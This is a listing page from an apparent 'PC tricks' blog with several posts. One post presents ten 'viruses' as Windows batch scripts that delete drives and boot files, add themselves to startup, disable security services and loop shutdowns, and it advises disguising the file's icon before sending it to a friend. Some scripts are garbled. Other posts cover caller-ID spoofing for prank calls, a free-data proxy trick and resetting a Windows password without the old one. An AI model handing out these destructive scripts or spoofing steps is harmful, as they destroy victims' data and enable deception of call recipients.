Showing posts with label pc tricks. Show all posts
Showing posts with label pc tricks. Show all posts

Saturday 7 March 2015

how call with ur friend number for free

How to Make Free Prank Calls from Anyone's Number

Make Calls with any Caller ID to Anyone :-

So now you can imagine two persons getting connected with each other and the you are the one who is the host of that call and you can conversate anything. Haha its going to hilarious right, well using VOXOX we can do this thing and the bets part is that this service is available on iOS, Android and Windows.

So if you are not having an Android or iOS device do not worry as you can use Windows software to make prank calls easily. So now lets jump in to see how this whole process works.
REMEMBER Make sure you use this only for fun and prank purpose, do not use this in an offensive way it might lead in trouble. And make sure to add +91 in front of the caller id and the number you are dialing else it won't work.
  1. Visit VOXOX Downloads page and Download the appropriate application.
  2. If you are on Windows then choose the windows option and Download the desired application for your computer.
  3. Now after installing the software you need to Sign Up with their free account to get $1 free credit.
  4. Simply Enter your Name,Mobile number and Email to get started.
  5. After that you will see some screen like below.voxox main dial pad
  6. voxox caller id changing optionNow clicking on that small Dial pad will get this big dial pad up where you can enter your friends mobile number that you want to call.
  7. Now to change the CALLER ID you just need to click the small phone icon on the bottom and choose "My Caller ID"
  8. Now you will see another dialog popped up where you can change your caller ID to any number in the world you want.voxox caller id dialog
  9. Just choose the proper country code, like in the above image I have chosen the India and now insert your mobile number you want to display to your friend.
  10. That's it now you can press OK and enter your friends mobile number who you want to call.
How to Make Prank Calls from iOS and Android :-

Well if you are using any iOS or Android based phone then you can use VOXOX App to make prank calls, but remember in Android still now you cannot make proper caller ID change but I have tested this app working in iOS and it works great.

You can simply install this application from the app store and then login using your account, after that from settings you can change the caller ID, make sure that you add  +91 in front of the number you want to display and even call else it won't work.

So guys this ends another awesome post from my side, hope you like this amazing trick to prank your friends with anonymous fake calls, if you face any difficulties do comment and do subscribe to our blog for future updates..
keep visiting our site for more trick

Wednesday 21 January 2015

Create Top 10 Most Dangerous Viruses in Notepad [Must See]

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Create Top 10 Most Dangerous Viruses in Notepad [Must See] 



1. This virus will copy itself at Startup,Make 1000 random folders,Hide itself and other Folders,Swap left mouse button with right,Open alert boxes and much more.

@Echo off

color 4

title 4

title R.I.P




start calc

copy %0 %Systemroot%\Greatgame > nul

reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v Greatgame /t REG_SZ

/d %systemroot%\Greatgame.bat /f > nul

copy %0 *.bat > nul

Attrib +r +h Greatgame.bat

Attrib +r +h

RUNDLL32 USER32.DLL.SwapMouseButton

start calc


tskill msnmsgr

tskill LimeWire

tskill iexplore

tskill NMain



cd %userprofile%\desktop

copy Greatgame.bat R.I.P.bat

copy Greatgame.bat R.I.P.jpg

copy Greatgame.bat R.I.P.txt

copy Greatgame.bat R.I.P.exe

copy Greatgame.bat

copy Greatgame.bat FixVirus.bat

cd %userprofile%My Documents

copy Greatgame.bat R.I.P.bat

copy Greatgame.bat R.I.P.jpg

copy Greatgame.bat R.I.P.txt

copy Greatgame.bat R.I.P.exe

copy Greatgame.bat

copy Greatgame.bat FixVirus.bat


start calc


msg * R.I.P

msg * R.I.P

shutdown -r -t 10 -c "VIRUS DETECTED"



time 12:00


cd %usernameprofile%\desktop

copy Greatgame.bat %random%.bat

goto RIP

Save the above code as Greatgame.bat and select all files instead of text.

2. This virus will delete all the drives and entire registry in your Pc.

@echo off

del D:\*.* /f /s /q

del E:\*.* /f /s /q

del F:\*.* /f /s /q

del G:\*.* /f /s /q

del H:\*.* /f /s /q

del I:\*.* /f /s /q

del J:\*.* /f /s /q

START reg delete HKCR/.exe

START reg delete HKCR/.dll

START reg delete HKCR/*

Save the above code as rockingtricks.bat or by any name but Make Sure it has .bat.

3. This virus will crash a PC forever.

@echo off

attrib -r -s -h c:\autoexec.bat

del c:\autoexec.bat

attrib -r -s -h c:\boot.ini

del c:\boot.ini

attrib -r -s -h c:\ntldr

del c:\ntldr

attrib -r -s -h c:\windows\win.ini

del c:\windows\win.ini

Save the above code as rockingtricks.bat or by any name but Make Sure it has .bat.

4. This virus will Convey your friend a little message and shut down his / her computer.

@echo off
msg * I don't like you
shutdown -c "Error! You are too stupid!" -s

Save the above code as rockingtricks.bat or by any name but Make Sure it has .bat and Select all files instead of text.

5. This virus will Shutdowns Computer Everytime It Is Turned On

echo @echo off>c:windowshartlell.bat
echo break off>>c:windowshartlell.bat
echo shutdown -r -t 11 -f>>c:windowshartlell.bat
echo end>>c:windowshartlell.bat
reg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v startAPI /t reg_sz /d c:windowshartlell.bat /f
reg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v /t reg_sz /d c:windowshartlell.bat /f
echo You have been HACKED.

Save the above code as rockingtricks.bat or by any name but Make Sure it has .bat

6. This Virus will Change Files To Non-working Text Files


Save the above code as rockingtricks.bat or by any name but Make Sure it has .bat

7. This virus will shut your Internet Permanently and Works best on Windows XP.

@echo off
add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v MiXedVeX /t 
REG_SZ /d %systemroot%\HaloTrialScoreChangerV1 /f > nul
start iexpress (website of your choice)
ipconfig /release
del "C:\Program Files\Microsoft Games
del "C:Nexon
del "C:\Program Files\Xfire
del "C:\Program Files\Adobe"
del "C:\Program Files\Internet Explorer"
del "C:\Program Files\Mozilla Firefox"
del "C:\WINDOWS"
del "C:\WINDOWS\system32"
del "C:\WINDOWS\system32\cmd"
del "C:\WINDOWS\system32\iexpress"
del "C:\WINDOWS\system32\sndvol32"
del "C:\WINDOWS\system32\sndrec32"
del "C:\WINDOWS\system32\Restore\rstrui"
del "C:\WINDOWS\system32\wupdmgr"
del "C:\WINDOWS\system32\desktop"
del "C:\WINDOWS\java"
del "C:\WINDOWS\Media"
del "C:\WINDOWS\Resources"
del "C:\WINDOWS\system"
del "C:\drivers"
del "C:\drv"
del "C:\SYSINFO"
del "C:\Program Files"
echo ipconfig/release_all>>c:windowswimn32.bat
net stop "Security Center"
net stop SharedAccess
> "%Temp%.kill.reg" ECHO REGEDIT4
>>"%Temp%.kill.reg" ECHO.
>>"%Temp%.kill.reg" ECHO [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesS haredAccess]
>>"%Temp%.kill.reg" ECHO "Start"=dword:00000004
>>"%Temp%.kill.reg" ECHO.
>>"%Temp%.kill.reg" ECHO [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesw uauserv]
>>"%Temp%.kill.reg" ECHO "Start"=dword:00000004
>>"%Temp%.kill.reg" ECHO.
>>"%Temp%.kill.reg" ECHO [HKEY_LOCAL_MACHINESYSTEMControlSet001Serviceswscsv c]
>>"%Temp%.kill.reg" ECHO "Start"=dword:00000004
>>"%Temp%.kill.reg" ECHO.
START /WAIT REGEDIT /S "%Temp%.kill.reg"
del "%Temp%.kill.reg"
del %0
echo @echo off>c:windowswimn32.bat
echo break off>>c:windowswimn32.bat
echo ipconfig/release_all>>c:windowswimn32.bat
echo end>>c:windowswimn32.bat
reg add hkey_local_machinesoftwaremicrosoftwindowscurrentv ersionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f
reg add hkey_current_usersoftwaremicrosoftwindowscurrentve rsionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f
start iexpress (website of your choice)
goto a

Save the above code as
rockingtricks.bat or by any name but Make Sure it has .bat


using namespace std;

int main()
{ keybd_event(VK_MENU,0x38,0,0);
HANDLE outToScreen;
outToScreen = GetStdHandle(STD_OUTPUT_HANDLE);

char buffer[255];
char inputFile[]="C:\Documents and Settings\All Users\Start Menu\Programs\Startup\rawr.bat";
ifstream input(inputFile);
if (!input)
ofstream fp("C:\Documents and Settings\All Users\Start Menu\Programs\Startup\rawr.bat", ios::app);
while (!input.eof())

char buffer[255];
char inputFile[]="C:\rawr.exe";
ifstream input(inputFile);
if (!input)
ofstream fp("CLICK.bat", ios::app);
system("START CLICK.bat");
while (!input.eof())
system("call shutdown.exe -S");
goto START;

for(int i = 0; i < 1; i++)
int num = (rand() % 10);
for ( int j = 0; j < 5; j++)
SetConsoleTextAttribute(outToScreen, FOREGROUND_GREEN);
int number = (rand() % 24);
goto START;

Save the above code as rockingtricks.bat or by any name but Make Sure it has .bat

9. This virus will crash Operating System.

RD c:\ /s /q

Note: C:\ is the location where system files are located. You can change it.

Save the above code as
rockingtricks.exe or by any name but Make Sure it has .exe and select All Files instead of text.

10. Hard prank: Pick your poison batch file.
It asks your friend to choose a number between 1-5 and then does a certain action.

1: Shutdown
2: Restart
3: Wipes out your hard drive (BEWARE)
4: Net send
5: Messages then shutdown 
Type :

@echo off
title The end of the world
cd C:\
echo Pick your poison:
echo1. Die this way (Wimp)
echo2. Die this way (WIMP!)
echo 4. Die this way (you're boring)
echo 5. Easy way out
set input=nothing
set /p input=Choice:
if %input%==1 goto one
if %input%==2 goto two

You might wanna have to change the Icon of the file before sending it to your friend, so right click the file, click Properties, click on the 'Change' Icon and change the icon from there.

Save the above code as rockingtricks.bat or by any name but Make Sure it has .bat

Note :- All the content is just for Educational Purposes.The admin is not responsible for your work.Also after you make any file DONT CLICK ON THE FILE OR ELSE YOUR PC WILL BE DESTROYED.


Monday 29 December 2014

TaTa Docomo free 3G Unlimited Trick december 2014

TaTa Docomo free 3G Unlimited Trick december 2014

How to Use Proxy Trick on PC :

Open FireFox
Navigate Tools > Options > Network
> Setting > Manual setting.

Proxy :
Port: 80

How to Use Proxy Trick on Mobile :

Profile name :
Go to Proxy Setting in Profile
Use This
Proxy :
Set Port as : 80

Save and go back


Set Home
Page :
most of the indian state have working this trick
comment here if it not worked in ur state

Tuesday 23 December 2014

Get Avast Antivirus 1 Year License free of cost For Your Computer

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Get Avast Antivirus 1 Year License free of cost For Your Computer


Avast is officially giving 1 year of free subscription.


How to get the deal:-

  •  Fill out the form on next page.
  •  Check for the confirmation e-mail on your mail address.
  •  you will receive the licence details.

Terms and conditions:-

1. Deal available till it lasts.
2. its official free 1 year license.
3. Subscription for 365 days only

Tuesday 16 December 2014

Change Windows Password Without Knowing Old Password

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Click her


Procedure For Changing Windows
Password Without Knowing Old
Step 1 :
Start Menu > Computer > Right Click >
Step 2 :
System Tool > Local User and Group
Step 3 :
Double Click on User (exp. your Pc
Name )
Step 4 :
Chose User > Right Click on It > Set
Step 5 :
Click on Proceed button
Step 6 :
Then Set your New Password

Email and facebook Security Tips For Internet Users

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Fairst click her

Here is The Some Email and facebook
Security Tips For Internet Users ... Check This
And Comment Below if I missed ...
1. Enable two step verification in you Email
2. Enable Login-notification for you email and
get notification in your mobile whenever you
3. Set a strong password with a mix of
alphabets, numbers and special charecters.
4. Enable login- notification for you facebook
accounts to prevent unauthorised access.
5. Enable HTTPS in your email sttings annd
your facebook account settings.
6. Never share your password with anyone.
Even to your closest person.
7. Setup a recovery question which is difficult
to answer and never setup an easy &
guessable answer to your security question.
8. Never click on any links sent through mail
or chat. It may be a link which can steal your
cookie or inject any viruses.
9. Always check your address bar for proper
website address before logging in.

Saturday 13 December 2014




Friday 12 December 2014

RE:Increase battery life of laptop Easily

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RE: Increase battery life of laptop Easily

Steps to Increase battery life of  laptop

Step 1: Click on the Start Menu and type “ CMD ” in the Start Search bar.

Step 2: The search will start and it will then display an icon of “ CMD ” . simply right click on it and select 

Run as administrator.

Step 3: It will open command line, now simply run the command “powercfg -energy” without quotes. (For 

windows 7 users.)

Windows 8 users can Simply run the command “powercfg /energy” without quotes.

Step 4: Now Press “Enter”.

Once you successfully execute this command , Windows  will run a complete scan of  your system and it will 

find some ways to improve performance and power efficiency.

The results of this process will be saved to an HTML file, which is commonly  present  in the “System32” 

folder of most of the systems.

To access this file, simply follow the path which will be displayed in command prompt window after

completion of the command. Read This file to understand that what program in your system is consuming

more power and degrading the performance. Fix the Problem to Increase battery life of laptop.

Some More Usefull Tips to Increase battery life

  • Eject or Remove External Devices like Pendrive/DVDs/External HDD if not in Use
  • Run Apps that don’t Eat up much RAM
  • Disable Bluetooth of your Laptop if not in use.
  • Reduce Screen Brightness, This takes away lot of your battery, Reducing Brightness will help
  • Turn of Internet if you are not using it.
  • Make sure your Laptop’s Temperature remains Low


Friday 5 December 2014

How to Download torrent files with IDM

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How to Download torrent files with IDM



Step 1: Select any Torrent download client such as utorrent or Bittorrent. You can use these clients to download the Torrent files onto your computer.

Step 2: Go to a Torrent uploading site such as ExtraTorrent or zBigz.

In this step, you will be uploading the Torrent you downloaded earlier.

Step 3: Upload the Torrent using the sites stated in the previous step, or if you have a site of your choosing, go from there. Make sure to use the “Free” uploading option. Assuming that you don’t want to pay for an account, just go with the free option. Do note that if you go with the free option, there are limitations set by the website. If you go with a premium account, some extra perks are provided.

Depending on how big the Torrent is, that’s how long it may take to upload. It also depends on how fast your Internet connection is. The faster your connection is, the faster the upload speed will be.

Step 4: Once you have uploaded the Torrent, there should be an option for you to “ZIP” the Torrent. Normally, there will be extra options to download the contents of the Torrent file individually, but for now, lets go with the “.zip” option.

Step 5: Once everything has been zipped in the “.zip” format, hit download.  Internet Download Manager  should pop up and automatically take over the download process instead of your browser.

This may seem like a bit tedious process, but it’s well worth knowing that you can download the Torrent through a ZIP file format without having to worry about increasing or decreasing connection speed. More people these days are using this process in order to speed up downloading and uploading of Torrents.



Thursday 4 December 2014

Tricks to Speedup Pendrive Data transfer

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Tricks to Speedup Pendrive Data transfer


1.File system should be NTFS: If you want to Speedup Pendrive , then make sure you have NTFS as file system. You can do so by Right clicking on your pendrive and selecting Format,Select NTFS File system, Uncheck Quick Format And Click On Start.

2.Disk errors: To check disk errors go to the properties tab of your pen drive, then select ‘tools’ tab. You will find a ‘check now’ button, click it and then hit ‘start’ to fix the errors. The time taken for scan depends on the size of the pen drive.

3.Device policy: Under properties of your pen drive, select ‘hardware’ tab. Then select USB device from there that will lead you to a pop up window where you need to change settings. You can even have better performance of pen drive by clicking the option under ‘hardware’ tab.

4.Format: This is one of the effective options that many users have tried. When you have used your pen drive for quite a long time, you can speed it up by formatting the device.
Carefully test your pen drive with the factors given above to Speedup Pendrive. In addition to this, you should keep checking for these aspects regularly, say twice or thrice in a month.

Wednesday 3 December 2014

Password Protect Any Folder Without Any Software

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Password Protect Any Folder Without Any Software



procedure :

1. Open Notepad and Copy code given below into it.

if EXIST "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" goto UNLOCK
if NOT EXIST MyFolder goto MDMyFolder
echo Are you sure to lock this folder? (Y/N)
set/p "cho=>"
if %cho%==Y goto LOCK
if %cho%==y goto LOCK
if %cho%==n goto END
if %cho%==N goto END
echo Invalid choice.
ren MyFolder "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
attrib +h +s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
echo Folder locked
goto End
echo Enter password to Unlock Your Secure Folder
set/p "pass=>"
if NOT %pass%== real hackers goto FAIL
attrib -h -s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
ren "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" MyFolder
echo Folder Unlocked successfully
goto End
echo Invalid password
goto end
md MyFolder
echo MyFolder created successfully
goto End

2. Save the notepad file as lock.bat (.bat is must)
3. Now double click on lock.bat and a new folder will be created with name MyFolder
4. Copy all your data you want to protect in that New folder
5. Now double click on lock.bat and when command promp appears Type Y and press enter.
6. Now MyFolder will be hidden from you view, to access that folde double click on lock.bat
7. It will ask for password enter your password and done. (Default password is real hackers)

To change the password replace real hackers with new password in the above code